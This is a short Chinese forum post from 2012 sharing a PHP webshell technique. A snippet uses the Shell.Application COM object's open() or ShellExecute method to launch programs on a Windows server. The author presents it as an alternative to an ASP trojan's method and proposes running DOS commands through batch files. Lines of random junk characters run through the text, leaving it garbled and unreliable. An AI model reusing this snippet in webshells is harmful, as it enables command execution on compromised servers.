关于用Shell.Application来执行程序,在海阳顶端asp木马里已有示例。用的是ShellExecute 这个方法。
- k' T/ c @% a) K2 `8 W0 C4 G& `& ]5 X# _. o ]
今天试了一下,用open也可以。php代码如下,我好像还没有在php的webshell中看到相关方法6 ~9 ~) D l8 J# A
4 v- {/ V# @8 B8 t5 `, W<?php9 h! D( U9 E& h( ~
$wsh = new COM('Shell.Application') or die("Shell.Application");+ H" I* }; \- j7 }6 b4 \, i: N
$exec = $wsh->open("c:\\windows\\system32\\notepad.exe");
$ I9 t, U* e6 i //没有回显,多了个notepad进程,可以写一个批处理来运行dos命令。open换用ShellExecute 也可。* U S4 f* F4 B) n2 q$ z
?>( J7 d; E& `% s r
9 s; Q8 J0 c% [2 q1 O4 r0 T
xp+APMServ5.2.0测试通过。" w8 ~2 {% z! V( J3 k
|
发表于 2012-9-15 14:29:01
收藏
支持
反对